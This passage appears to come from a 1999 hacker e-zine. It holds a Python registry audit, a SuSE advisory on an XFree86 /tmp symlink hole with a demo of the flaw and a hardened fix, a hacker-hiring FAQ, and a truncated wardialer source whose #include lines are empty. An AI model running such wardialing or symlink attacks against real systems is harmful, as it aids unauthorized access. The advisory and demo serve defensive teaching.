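_DWORD_LINE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{1,8})$')


def parse_reg_dwords(reg_text):
    """Return {key path, lower-cased: {value name: int}} for each dword in a .reg export."""
    keys, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = _KEY_LINE.match(line)
        if key:
            current = keys.setdefault(key.group(1).lower(), {})
            continue
        dword = _DWORD_LINE.match(line)
        if dword and current is not None:
            current[dword.group(1)] = int(dword.group(2), 16)
    return keys


def decode_options6(value):
    """Names of the documented options whose bit is set in an Options6 value."""
    return [name for bit, name in OPTIONS6_BITS.items() if value & (1 << bit)]


def audit_options6(reg_text):
    """Report the protection state and the value that enables it without touching other bits."""
    values = parse_reg_dwords(reg_text).get(EXCEL_KEY.lower(), {})
    if "Options6" not in values:
        # The post does not say what Excel assumes when the value is absent,
        # so this case is only flagged for manual review.
        return {"status": "missing", "current": None, "fixed": None, "options": []}
    current = values["Options6"]
    enabled = bool(current & MACRO_VIRUS_PROTECTION)
    return {
        "status": "enabled" if enabled else "disabled",
        "current": current,
        "fixed": current | MACRO_VIRUS_PROTECTION,  # bits 0-2 and 4-15 preserved
        "options": decode_options6(current),
    }


# Constructed sample exports, one per hypothetical workstation.
_HEADER = "REGEDIT4\n\n[" + EXCEL_KEY + "]\n"
SAMPLE_EXPORTS = {
    "ws-01": _HEADER + '"Options6"=dword:0000000f\n',     # protection on
    "ws-02": _HEADER + '"Options6"=dword:00000007\n',     # protection cleared
    "ws-03": _HEADER + '"ExampleValue"=dword:00000001\n',  # Options6 absent
}


def audit_fleet(exports):
    """Audit every export and return {host: result}."""
    return {host: audit_options6(text) for host, text in exports.items()}


if __name__ == "__main__":
    for host, result in audit_fleet(SAMPLE_EXPORTS).items():
        fixed = "-" if result["fixed"] is None else "dword:%08x" % result["fixed"]
        print(f"{host}: {result['status']:8} write {fixed}")
```
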

'nuff said ...

rotaiv -£-

@HWA

17.0 xfree86 SUSE exploit
     ~~~~~~~~~~~~~~~~~~~~

Date: Sun, 28 Mar 1999 23:20:58 +0200
From: Marc Heuse
To: BUGTRAQ@netspace.org
Subject: SuSE Security Announcement - XFree86

-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

SuSE Security Announcement

Package:  xf86-3.3.3-5
Date:     Sun Mar 28 12:26:39 CEST 1999
Affected: unix operating systems using xfree86
______________________________________________________________________________

A security hole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s).

Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue.

Thanks to the people from bugtraq for providing the details of this vulnerability and especially the XFree86 programmers who made a fix ready over the weekend.

Please note, that we provide this information on an "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package.
______________________________________________________________________________

1. Problem Description

XFree86 creates a directory in /tmp with the name .X11-unix for the X sockets and sets the directory to mode 1777. If an attacker creates a symlink with that filename and points it to another directory (e.g. /root), the permissions of the target directory are set to 1777.

2. Impact

A local attacker may create files with any contents in any directory.

3. Solution

Upgrade your XF86.
As a temporary fix you can put these commands into /sbin/init.d/boot.local:

    /bin/rm -rf /tmp/.X11-unix
    mkdir -p -m 1777 /tmp/.X11-unix
______________________________________________________________________________

Here are the md5 checksums of the upgrade packages, please verify these before installing the new packages:
______________________________________________________________________________

You will find the updates on our ftp-Server:

  SuSE 6.0:    ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/XFree86-
  SuSE <= 5.3: ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/XFree86-

Webpage for patches: http://www.suse.de/patches/index.html

or try the following web pages for a list of mirrors:

  http://www.suse.de/ftp.html
  http://www.suse.com/ftp_new.html
______________________________________________________________________________

SuSE has got two free security mailing list services to which any interested party may subscribe:

suse-security@suse.com - unmoderated and for general/linux/SuSE security discussions. All SuSE security announcements are sent to this list.

suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security announcements are sent to this list.

To subscribe, send an email to majordomo@suse.com with the text

    subscribe suse-security

or

    subscribe suse-security-announce

in the body of the message. Or just issue a

    echo subscribe suse-security | mail majordomo@suse.com

or

    echo subscribe suse-security-announce | mail majordomo@suse.com
______________________________________________________________________________

If you want to report *NEW* security bugs in the SuSE Linux Distribution please send an email to security@suse.de or call our support line. You may use pgp with the public key below to ensure confidentiality.
______________________________________________________________________________

This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way. Visit http://www.suse.de/security for our pgp finger print.
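
[Added example, not part of the SuSE advisory and not XFree86 code: the symlink problem from "1. Problem Description", exercised inside a temporary directory, next to a hardened routine that opens the path with O_NOFOLLOW and changes the mode through the file descriptor. The function names are made up for this example, and the unsafe routine is a simplified model of "create the directory, then set its mode by name".]

```python
import os
import stat
import tempfile

SOCKET_DIR_MODE = 0o1777


def setup_socket_dir_unsafe(path):
    """Simplified model of the flaw: reuse whatever exists, then chmod by name."""
    try:
        os.mkdir(path)
    except FileExistsError:
        pass  # an attacker-planted symlink ends up here as well
    os.chmod(path, SOCKET_DIR_MODE)  # chmod follows the symlink to its target


def setup_socket_dir_safe(path, owner_uid=None):
    """Create or reuse the directory only if it is a real directory we own."""
    owner_uid = os.geteuid() if owner_uid is None else owner_uid
    try:
        os.mkdir(path, 0o700)
    except FileExistsError:
        pass
    # O_NOFOLLOW: fail if the final path component is a symlink.
    # O_DIRECTORY: fail if it is anything other than a directory.
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)  # inspect the object we actually opened
        if not stat.S_ISDIR(st.st_mode) or st.st_uid != owner_uid:
            raise PermissionError(f"{path}: not a directory owned by uid {owner_uid}")
        os.fchmod(fd, SOCKET_DIR_MODE)  # applies to the opened directory, not the name
    finally:
        os.close(fd)


def demo():
    """Run both routines against a constructed symlink in a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim")  # stands in for e.g. /root
        os.mkdir(victim)
        os.chmod(victim, 0o700)
        link = os.path.join(tmp, ".X11-unix")
        os.symlink(victim, link)

        # Unsafe routine: the victim directory becomes world-writable.
        setup_socket_dir_unsafe(link)
        mode_after_unsafe = stat.S_IMODE(os.stat(victim).st_mode)

        # Reset, then try the hardened routine on the same symlink.
        os.chmod(victim, 0o700)
        try:
            setup_socket_dir_safe(link)
            refused = False
        except OSError:
            refused = True
        mode_after_safe = stat.S_IMODE(os.stat(victim).st_mode)

        # With the symlink gone, the hardened routine creates the real directory.
        os.unlink(link)
        setup_socket_dir_safe(link)
        st = os.lstat(link)
        created_ok = stat.S_ISDIR(st.st_mode) and stat.S_IMODE(st.st_mode) == SOCKET_DIR_MODE
    return mode_after_unsafe, refused, mode_after_safe, created_ok


if __name__ == "__main__":
    unsafe_mode, refused, safe_mode, created_ok = demo()
    print("victim mode after unsafe setup:", oct(unsafe_mode))
    print("hardened setup refused symlink:", refused)
    print("victim mode after hardened setup:", oct(safe_mode))
    print("real directory created with 1777:", created_ok)
```
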

Type Bits/KeyID    Date       User ID
pub  2048/3D25D3D9 1999/03/06 SuSE Security Team

@HWA

18.0 The proper care and feeding of your new hacker will ensure months of enjoyable employment on end.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is from: http://www.plethora.net/~seebs/faqs/hacker.html

The following list is an attempt to cover some of the issues that will invariably come up when people without previous experience of the hacker community try to hire a hacker. This FAQ is intended for free distribution, and may be copied as desired. It is in an early revision. If you wish to modify the FAQ, or distribute it for publication, please contact the author. The author is seebs@plethora.net. The official distribution site (as of revision 0.04) is "http://www.plethora.net/~seebs/faqs/hacker.html".

If you find this information useful, please consider sending a token donation to the author; email for details.

DISCLAIMER: The author is a hacker. Bias is inevitable.

This document is copyright 1995, 1996, 1998 Peter Seebach. Unaltered distribution is permitted.

Revision 0.04 - Last modified September 7, 1998

Questions and Answers:

Section 0: Basic understanding.

0.0: Won't my hacker break into my computer and steal my trade secrets?

No. Hackers aren't, contrary to media reporting, the people who break into computers. Those are crackers. Hackers are people who enjoy playing with computers. Your hacker may occasionally circumvent security measures, but this is not malicious; she just does it when the security is in her way, or because she's curious.

0.1: Was it a good idea to hire a hacker?

It depends on the job. A hacker can be dramatically more effective than a non-hacker at a job, or dramatically less effective. Jobs where hackers are particularly good are:

    Systems administration
    Programming
    Design

Jobs where hackers are particularly bad are

    Data entry

More generally, a job that requires fast and unexpected changes, significant skill, and is not very repetitive will be one a hacker will excel at.
Repetitive, simple jobs are a waste of a good hacker, and will make your hacker bored and frustrated. No one works well bored and frustrated. The good news is, if you get a hacker on something he particularly likes, you will frequently see performance on the order of five to ten times what a "normal" worker would produce. This is not consistent, and you shouldn't expect to see it all the time, but it will happen. This is most visible on particularly difficult tasks. 0.2: How should I manage my hacker? The same way you herd cats. It can be a bit confusing; they're not like most other workers. Don't worry! Your hacker is likely to be willing to suggest answers to problems, if asked. Most hackers are nearly self-managing. 0.3: Wait, you just said "10 times", didn't you? You're not serious, right? Actually, I said "ten times". And yes, I am serious; a hacker on a roll may be able to produce, in a period of a few months, something that a small development group (say, 7-8 people) would have a hard time getting together over a year. They also may not. Your mileage will vary. IBM used to report that certain programmers might be as much as 100 times as productive as other workers, or more. This kind of thing happens. 0.4: I don't understand this at all. This is confusing. Is there a book on this? Not yet. In the meantime, check out The New Hacker's Dictionary (references below; also known as "the jargon file"), in particular some of the appendices. The entire work is full of clarifications and details of how hackers think. Section 1: Social issues 1.0: My hacker doesn't fit in well with our corporate society. She seems to do her work well, but she's not really making many friends. This is common. Your hacker may not have found any people around who get along with hackers. You may wish to consider offering her a position tele-commuting, or flexible hours (read: night shift), which may actually improve her productivity. Or hire another one. 
1.1: My hacker seems to dress funny. Is there any way to impress upon him the importance of corporate appearance? Your hacker has a very good understanding of the importance of corporate appearance. It doesn't help you get your job done. IBM, Ford, and Microsoft have all realized that people work better when they can dress however they want. Your hacker is dressed comfortably. A polite request to dress up some for special occasions may well be honored, and most hackers will cheerfully wear clothes without holes in them if specifically asked. 1.2: My hacker won't call me by my title, and doesn't seem to respect me at all. Your hacker doesn't respect your title. Hackers don't believe that management is "above" engineering; they believe that management is doing one job, and engineering is doing another. They may well frequently talk as if management is beneath them, but this is really quite fair; your question implies that you talk as if engineering is beneath you. Treat your hacker as an equal, and she will probably treat you as an equal -- quite a compliment! 1.3: My hacker constantly insults the work of my other workers. Take your hacker aside, and ask for details of what's wrong with the existing work. It may be that there's something wrong with it. Don't let the fact that it runs most of the time fool you; your hacker is probably bothered by the fact that it crashes at all. He may be able to suggest improvements which could dramatically improve performance, reliability, or other features. It's worth looking into. You may be able to convince your hacker to be more polite, but if there appear to be major differences, it's quite possible that one or more of your existing staff are incompetent. Note that hackers, of course, have different standards of competence than many other people. (Read "different" as "much higher".) Section 2: Productivity. 2.0: My hacker plays video games on company time. 
Hackers, writers, and painters all need some amount of time to spend "percolating" -- doing something else to let their subconscious work on a problem. Your hacker is probably stuck on something difficult. Don't worry about it. 2.1: But it's been two weeks since I saw anything! Your hacker is working, alone probably, on a big project, and just started, right? She's probably trying to figure it all out in advance. Ask her how it's going; if she starts a lot of sentences, but interrupts them all with "no, wait..." or "drat, that won't work", it's going well. 2.2: Isn't this damaging to productivity? No. Your hacker needs to recreate and think about things in many ways. He will be more productive with this recreation than without it. Your hacker enjoys working; don't worry about things getting done reasonably well and quickly. 2.3: My hacker is constantly doing things unrelated to her job responsibilities. Do they need to be done? Very few hackers can resist solving a problem when they can solve it, and no one else is solving it. For that matter, is your hacker getting her job done? If so, consider these other things a freebie or perk (for you). Although it may not be conventional, it's probably helping out quite a bit. 2.4: My hacker is writing a book, reading USENET news, playing video games, talking with friends on the phone, and building sculptures out of paper clips. On company time! He sounds happy. The chances are he's in one of three states: 1.Basic job responsibilities are periodic (phone support, documentation, et al.) and there's a lull in incoming work. Don't worry about it! 2.Your hacker is stuck on a difficult problem. 3.Your hacker is bored silly and is trying to find amusement. Perhaps you should find him more challenging work? Any of these factors may be involved. All of them may be involved. In general, if the work is challenging, and is getting done, don't worry too much about the process. 
You might ask for your corporation to be given credit in the book. 2.5: But my other workers are offended by my hacker's success, and it hurts their productivity. Do you really need to have workers around who would rather be the person getting something done, than have it done already? Ego has very little place in the workplace. If they can't do it well, assign them to something they can do. Section 3: Stimulus and response 3.0: My hacker did something good, and I want to reward him. Good! Here are some of the things most hackers would like to receive in exchange for their work: 1.Respect. 2.Admiration. 3.Compliments. 4.Understanding. 5.Discounts on expensive toys. 6.Money. These are not necessarily in order. The 4th item (understanding) is the most difficult. Try to remember this good thing your hacker just did the next time you discover he just spent a day playing x-trek. Rather than complaining about getting work done, write it off as "a perk" that was granted (informally) as a bonus for a job well done. Don't worry; hackers get bored quickly when they aren't doing their work. 3.1: My hacker did something bad, and I want to punish him. Don't. 30 years of psychological research has shown that punishment has no desirable long-term effects. Your hacker is not a lab rat. (Even if he *were* a lab rat, punishment wouldn't work; at least, not if he were one of the sorts of lab rats the psych research was done on.) If you don't like something your hacker is doing, express your concerns. Explain what it is that bothers you about the behavior. Be prepared for an argument; your hacker is a rational entity, and presumably had reasons. Don't jump on him too quickly; they may turn out to be good reasons. Don't be afraid to apologize if you're wrong. If your hacker admits to having been wrong, don't demand an apology; so far as the hacker is concerned, admitting to being wrong is an apology, most likely. 3.2: I don't get it. 
I offered my hacker a significant promotion, and she turned it down and acted offended. A promotion frequently involves spending more time listening to people describing what they're doing, and less time playing with computers. Your hacker is enjoying her work; if you want to offer a reward, consider an improvement in title, a possible raise, and some compliments. Make sure your hacker knows you are pleased with her accomplishments -- that's what she's there for. 3.3: My company policy won't let me give my hacker any more raises until he's in management. Your company policy is broken. A hacker can earn as much as $150 an hour (sometimes more) doing free-lance consulting. You may wish to offer your hacker a contracted permanent consulting position with benefits, or otherwise find loopholes. Or, find perks to offer - many hackers will cheerfully accept a discount on hardware from their favorite manufacturer as an effective raise. 3.4: I can't believe the hacker on my staff is worth as much as we're paying. Ask the other staff in the department what the hacker does, and what they think of it. The chances are that your hacker is spending a few hours a week answering arcane questions that would otherwise require an expensive external consultant. Your hacker may be fulfilling another job's worth of responsibilities in his spare time around the office. Very few hackers aren't worth what they're getting paid; they enjoy accomplishing difficult tasks, and improving worker efficiency. Section 4: What does that mean? 4.0: My hacker doesn't speak English. At least, I don't think so. Your hacker is a techie. Your best bet is to pick up a copy of TNHD (The New Hacker's Dictionary). It can be found as http://www.ccil.org/jargon (last I checked) or from a good bookstore. If you have trouble understanding that reference, ask your hacker if she has a copy, or would be willing to explain her terms. Most hackers are willing to explain terms. 
Be ready for condescension; it's not intended as an insult, but if you don't know the words, she probably has to talk down to you at first to explain them.

It's a reasonably difficult set of words; there are a lot of them, and their usage is much more precise than it sounds. Hackers love word games.

[It is also possible that English is not your hacker's native language, and that it's not yours either. Feel free to substitute a more appropriate language.]

4.1: I can't get an estimate out of my hacker.

Your hacker hasn't figured out how hard the problem is yet. Unlike most workers, hackers will try very hard to refuse to give an estimate until they know for sure that they understand the problem. This may include solving it.

No good engineer goes beyond 95% certainty. Most hackers are good engineers. If you say you will not try to hold him to the estimate (and mean it!) you are much more likely to get an approximate estimate. The estimate may sound very high or very low; it may be very high or very low. Still, it's an estimate, and you get what you ask for.

4.2: My hacker makes obscure, meaningless jokes.

If you feel brave, ask for an explanation. Most of them can be explained. It may take a while, but it may prove interesting.

4.3: My hacker counts from zero.

So does the computer. You can hide it, but computers count from zero. Most hackers do by habit, also.

Comments about this article can be sent to seebs@plethora.net

19.0 Unix wardialer from w00w00 security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This is included here for example purposes; the full source is available at
http://www.w00w00.org/w00w00/ShokDial/

ShokDial Unix Wardialer source

/* ShokDial */
/* w00w00! */
/* This is (I have never seen one anyway, I apologize if I'm wrong) */
/* the first war dialer that I've ever seen for unix. This will */
/* compile on most/all unix operating systems. */
/* */
/* Shok (Matt Conover) */
/* shok@sekurity.org, shok@w00w00.org */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "colors.h"

#define ERROR -1

/*
 * Used as the default logfile,
 * unless you change this define
 * or specify it as an option.
 * Type: shokdial -h for help.
 */
#define LOGFILE "wardial.log"

#define VERSION "v4.1"

/*
 * YOU WANT TO CONFIGURE THIS!!!
 * This is how long it will wait until it
 * gives up (or connects, whichever comes first)
 */
#define TIMEOUT 25

/* You can do:
 * ln -s /dev/cua1 /dev/modem
 * or change this to /dev/cua1 (or whatever your COM is)
 * cua0 = COM1 cua1 = COM2
 * (in linux)...in IRIX this would be /dev/ttymX I believe
 */
#define MODEMPORT "/dev/modem"

/* Global variables */
/* ---------------- */
int fd;               /* fd for modem */
int rand;             /* Use random scanning if this is set */
int send;             /* Do we send a string to the carrier? */
int daemon;           /* Do we fork into the background? */
int listen;           /* Do we check a response from the carrier? */
int useStdin;         /* Do we read numbers from stdin? */
int numbytes;         /* To verify that all the bytes were written */
int First3Digits;     /* Such as "555" of 555-XXXX */
                      /* However, this also serves as the area code */
                      /* for a long distance number */
int First3Digits1;    /* This allows multiple ranges such as */
                      /* 555-XXXX through 556-XXXX */
int Last3Digits;      /* Used as XXX-555-XXXX */
int Last3Digits1;     /* Same purpose as First3Digits1 */
int ScanMin;          /* Number to scan from....like 0000 and up */
int ScanMin1;         /* Where to hold ScanMin the whole time */
int ScanMax;          /* Stop scanning when this number is reached */
int response;         /* Used to test if response timed out */
char *LogFile;        /* Where to log connections */
char buf[2048];       /* Buffer for strings returned by modem */
char pnum[512];       /* This is the phone number from config file */
char LocalOrLong;     /* Dialing long distance or local */
char sendstring[512]; /* String to send to carrier (if send is set) */
char *ProgName;
int noshow;           /* Don't display opening port when reopening */
int conf;             /* Dial using config file */
int noOK;             /* Used with hanging up and checking "OK" */
volatile int sig;     /* Set after signal received and finished */
volatile int connected = 0; /* Set to 1 when connected. */

/* Some statistics. */
int busy = 0;
int connect = 0;
int noresponse = 0;

/* Function prototypes */
/* ------------------- */
void usage();                 /* Help/usage */
void version();               /* Display version */
void intro();                 /* An introduction */
void daemonize_me();          /* Fork into the background */
void get_scanrange();         /* Get the scanning range */
void open_port();             /* Open modem port for dialing */
void init_modem();            /* Initialize the modem */
void dial_number();           /* Dial the number */
void inputdial();             /* Read numbers from stdin */
void confdial(char *confile); /* For reading/dialing from conf file */
void hangup();                /* Hang up modem. */
void menu(int signum);        /* Called when an abort is received. */
void sighandler(int signum);  /* Used when signals are received */
void sighandler1(int signum); /* Ditto */
void stopnow(int signum);     /* Called from sig handler for an un- */
                              /* conditional exit. */

/* Function prototypes in other source files: */
/* ------------------------------------------ */

/* Check read/write/opens for errors */
void check_for_error(char *LogFile, int fd, int num, char *s);

/* Check for "OK" from modem in reads. */
int checkok(char *LogFile, int fd, char *buf, char *s);

/* Check if the phone num was valid. */
void local_validnum(int digits);
void long_validnum(int firstdigits, int lastdigits);

/* Check to make sure they didn't pass conflicting options. */
void checkoptions();

/* Other miscellaneous prototypes included to avoid. */
int clr();
void strip();

int main(int argc, char **argv)
{
  int opt;
  char *confile;

  clr(); /* Clear the screen. */

  /* Do some stuff with the arguments */
  /* ----------------------------------------------------- */
  ProgName = argv[0];

  if (argc > 1) {
    while ((opt = getopt (argc, argv, "SsrdvhL:lc:")) != ERROR)
      switch(opt) {
        case 'S':
          useStdin = 1;
          break;
        case 's':
          send = 1;
          break;
        case 'r':
          rand = 1;
          break;
        case 'd':
          daemon = 1;
          break;
        case 'v':
          version();
        case 'h':
          usage();
        case 'L':
          LogFile = optarg;
          break;
        case 'l':
          listen = 1;
          break;
        case 'c':
          conf = 1;
          confile = optarg;
          break;
        case '?':
          putchar('\n');
          usage();
        default:
          usage();
      }
  }

  /* Check to make sure they didn't pass conflicting options. */
  checkoptions(); /* exit()'s if there is an error */

  if (conf != 1 && useStdin != 1)
    printf("\"%s-r%s\" (%srandom scanning%s) option not given, using %ssequential scanning%s instead.\n",
           PINK, NORMAL, BOLDWHITE, NORMAL, BOLDRED, NORMAL);

  if (LogFile == NULL) {
    LogFile = LOGFILE;
    printf("Using \"%s%s%s\" as log file.\n", BOLDGREEN, LogFile, NORMAL);
  }

  printf("\nHit any key to continue...");
  getchar();
  /* ----------------------------------------------------- */

  clr(); /* Clear the screen. */
  intro();
  clr(); /* Clear the screen. */

  if (conf != 1 && useStdin != 1) get_scanrange();

  /* We don't want to handle any signals until here */
  signal(SIGINT, menu);
  signal(SIGTERM, menu);
  signal(SIGHUP, SIG_IGN);
  signal(SIGALRM, sighandler1);

  if (daemon == 1) daemonize_me(); /* Run the program in the background */

  open_port();  /* Open MODEMPORT (by default /dev/cua1) */
  init_modem(); /* Initialize modem (such as sending ATZ) */

  if (send == 1) {
    printf("Enter string to send to carrier (when connected): ");
    scanf("%511s", sendstring); /* leave room for the terminating NUL */
  }

  /* What type of dialing are we using? */
  if (conf == 1) confdial(confile);   /* Read numbers to dial from a config file */
  else if (useStdin == 1) inputdial(); /* Read numbers from stdin */
  else dial_number();                  /* Do the scanning (used by default, instead */
                                       /* of confdial(), inputdial(), etc.) */
  /* ---------------------------------- */

  hangup();  /* Hang up the modem */
  close(fd); /* Close the open file descriptor of the modem */
  return 0;
}

/* -------------------------------------------------- */

void version()
{
  printf("This is %sS%sh%so%sk%sD%si%sa%sl %s%s%s...please keep notice of this.\n",
         BOLDCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
         BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);
  printf("in case this program under goes some new features, fixes, etc.\n\n");
  printf("\t\t\t%s Shok %s\n\t\t (%sMatt Conover%s)\n\n",
         BOLDBLUE, NORMAL, BOLDWHITE, NORMAL);
  printf("%sEmail%s: %sshok@w00w00.org%s, %sshok@sekurity.org%s\n",
         BOLDWHITE, NORMAL, PINK, NORMAL, PINK, NORMAL);
  printf("%sWWW%s: %shttp://www.w00w00.org/%s\n",
         BOLDWHITE, NORMAL, PINK, NORMAL);
  printf("%sFTP%s: %sftp://ftp.w00w00.org/pub%s\n\n",
         BOLDWHITE, NORMAL, PINK, NORMAL);
  exit(0);
}

/* -------------------------------------------------- */

void usage()
{
  printf("Usage: %s%s %s[-rhvdSsl]%s -c [config file]%s -L [logfile]%s\n\n",
         PINK, ProgName, BOLDWHITE, BOLDCYAN, BOLDGREEN, NORMAL);
  printf("Options:\n");
  printf("%s-r%s for %srandom%s (as opposed to %ssequential%s) scanning\n",
         BOLDCYAN, NORMAL, PINK, NORMAL, YELLOW, NORMAL);
  printf("%s-h%s for %shelp%s....what you're seeing now\n",
         PINK, NORMAL, BOLDRED, NORMAL);
  printf("%s-v%s for the %sversion%s...because this will probably undergo changes\n",
         BOLDGREEN, NORMAL, BOLDCYAN, NORMAL);
  printf("%s-d%s to run in the %sbackground%s.\n",
         BLUE, NORMAL, BOLDGREEN, NORMAL);
  printf("%s-S%s to read numbers from %sstdin%s\n",
         PINK, NORMAL, BOLDRED, NORMAL);
  printf("%s-l%s to listen for a %sresponse%s from the carrier\n",
         BOLDCYAN, NORMAL, PINK, NORMAL);
  printf("%s-s%s to send a %sstring%s to the carrier\n",
         BOLDGREEN, NORMAL, BOLDCYAN, NORMAL);
  printf("%s-c%s to read phone numbers from a %sconfig file%s.\n",
         YELLOW, NORMAL, BOLDCYAN, NORMAL);
  printf("%s-L%s to specify the %slogfile%s.\n",
         BOLDRED, NORMAL, PINK, NORMAL);
  putchar('\n');
  printf("The %slogfile%s is by default %s%s%s if not specified.\n",
         BOLDCYAN, NORMAL, BOLDGREEN, LOGFILE, NORMAL);
  printf("The %sconfig file%s is only specified if %s-c%s option is used.\n",
         PINK, NORMAL, BOLDCYAN, NORMAL);
  putchar('\n');
  exit(1);
}

/* -------------------------------------------------- */

void intro()
{
  printf("\t\t%sS%sh%so%sk%sd%si%sa%sl%s %s%s %sf%so%sr %sU%sN%si%sX%s\n",
         BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
         BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL, PINK, BOLDCYAN,
         BOLDGREEN, BOLDPINK, BOLDGREEN, BOLDWHITE, BOLDBLUE, NORMAL);
  printf("\t\t----------------------\n");
  printf("\nWell what you do here, is enter 0000 for the range to begin\n");
  printf("scanning and 9999 to end scanning if you want to scan all the\n");
  printf("possible ranges, but you can put 4444 for the number to start\n");
  printf("and 5555 for the number to begin to scan XXX-[4444-5555] for\n");
  printf("local numbers and it would be 1-XXX-XXX-[4444-5555] for long\n");
  printf("distance.\n");
  printf("\nAlso, you can use random scanning (as opposed to sequential\n");
  printf("scanning) by specifying the \"%s-r%s\" option...type:\n", PINK, NORMAL);
  printf("%s%s%s -h %sfor %shelp%s.\n\n",
         BOLDRED, ProgName, BOLDRED, NORMAL, BOLDCYAN, NORMAL);
  printf("Anyway, enjoy!\n\n");
  printf("\t\t\t%s Shok %s\n\t\t (%sMatt Conover%s)\n\n",
         BOLDBLUE, NORMAL, BOLDWHITE, NORMAL);
  printf("%sEmail%s: %sshok@w00w00.org%s, %sshok@sekurity.org%s\n",
         BOLDWHITE, NORMAL, PINK, NORMAL, PINK, NORMAL);
  printf("%sWWW%s: %shttp://www.w00w00.org/%s\n",
         BOLDWHITE, NORMAL, PINK, NORMAL);
  printf("%sFTP%s: %sftp://ftp.w00w00.org/pub%s\n\n",
         BOLDWHITE, NORMAL, PINK, NORMAL);
  printf("Hit enter to continue...\n");
  getchar();
}

/* -------------------------------------------------- */

void daemonize_me()
{
  pid_t pid;

  if ((pid = fork()) == ERROR) {
    perror("fork");
    exit(ERROR);
  }

  if (pid != 0) exit(0);
}

/* -------------------------------------------------- */

void get_scanrange()
{
  /* Get location of numbers: local numbers or long distance numbers */
LorD:
  printf("Scanning..\n(%sL%s)ocal, Long (%sD%s)istance: ",
         PINK, NORMAL, PINK, NORMAL);

  while(1) {
    LocalOrLong = getchar();
    if (!isprint(LocalOrLong)) continue;

    if ((toupper(LocalOrLong) != 'L') && (toupper(LocalOrLong) != 'D')) {
      printf("%sInvalid%s option '%s%c%s'. Enter '%sL%s' or '%sD%s'.\n\n",
             BOLDRED, NORMAL, BOLDCYAN, LocalOrLong, NORMAL,
             YELLOW, NORMAL, YELLOW, NORMAL);
      goto LorD; /* Reprint message. */
    } else break;
  }

  if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */
    if (rand != 1) { /* Using sequential scanning */
      printf("Enter number to begin scan on (555-1111): ");
      scanf("%3d%*c%4d", &First3Digits, &ScanMin);

      local_validnum(First3Digits); /* Make sure the first 3 digits */
                                    /* were a valid number. */

      ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
                          /* variable to store the original number. */
    } else { /* Using random scanning */
      printf("Enter the first 3 digits (555 for random scanning of 555-XXXX): ");
      scanf("%3d", &First3Digits);

      local_validnum(First3Digits); /* Make sure the first 3 digits */
                                    /* were a valid number. */

      ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
                          /* variable to store the original number. */
    }

    /* Make sure the last 4 digits were valid */
    if ((ScanMin < 0) || (ScanMin > 9999)) {
      printf("\"%s%d%s\" is invalid.\nScanning range must be %s0000-9999%s\n",
             BOLDCYAN, ScanMin, NORMAL, PINK, NORMAL);
      exit(ERROR);
    }

    if (rand != 1) { /* Using sequential scanning */
      printf("Enter number to end scanning on (555-9999): ");
      scanf("%3d%*c%4d", &First3Digits1, &ScanMax);

      local_validnum(First3Digits1); /* Make sure the first 3 digits */
                                     /* were a valid number. */
      putchar('\n');

      if ((ScanMax < ScanMin) || (ScanMax < 0) || (ScanMax > 9999)) {
        printf("\"%s%d%s\" is invalid.\n Scanning range must be %s0000-9999%s, and the %smaximum%s range must be %sgreater%s\nthan or equal to the %sminimum%s number.\n",
               BOLDCYAN, ScanMax, NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL,
               BOLDWHITE, NORMAL, PINK, NORMAL);
        exit(ERROR);
      }
    } else putchar('\n');

  /* -------------------- */

  } else if (toupper(LocalOrLong) == 'D') { /* Use long distance numbers */
    if (rand != 1) { /* Use sequential scanning */
      printf("Enter number to start scanning (555-555-1111): ");
      scanf("%3d%*c%3d%*c%4d", &First3Digits, &Last3Digits, &ScanMin);

      /* Check if area code and first 3 digits of the phone num are */
      /* valid. */
      long_validnum(First3Digits, Last3Digits);

      ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
                          /* variable to store the original number. */
      /* ... */
    } else { /* Using random scanning */
      printf("Enter the area code and prefix digits\n(555-555 for random scanning of 555-555-XXXX): ");
      scanf("%3d%*c%3d", &First3Digits, &Last3Digits);

      /* Check if area code and first 3 digits of the phone num are */
      /* valid. */
      long_validnum(First3Digits, Last3Digits);

      ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */
                          /* variable to store the original number. */
    }

    /* Make sure the last 4 digits were valid */
    if ((ScanMin < 0) || (ScanMin > 9999)) {
      printf("\"%s%d%s\" is invalid.\nScanning range must be %s0000-9999%s\n",
             BOLDCYAN, ScanMin, NORMAL, PINK, NORMAL);
      exit(ERROR);
    }

    if (rand != 1) { /* Using sequential scanning */
      printf("Enter number to end scanning (555-555-9999): ");
      scanf("%3d%*c%3d%*c%4d", &First3Digits1, &Last3Digits1, &ScanMax);
      putchar('\n');

      /* Check if area code and first 3 digits of the phone num are */
      /* valid. */
      long_validnum(First3Digits1, Last3Digits1);

      if ((ScanMax < ScanMin) || (ScanMax < 0) || (ScanMax > 9999)) {
        printf("\"%s%d%s\" is invalid.\n Scanning range must be %s0000-9999%s, and the %smaximum%s range must be %sgreater%s\nthan or equal to the %sminimum%s number.\n",
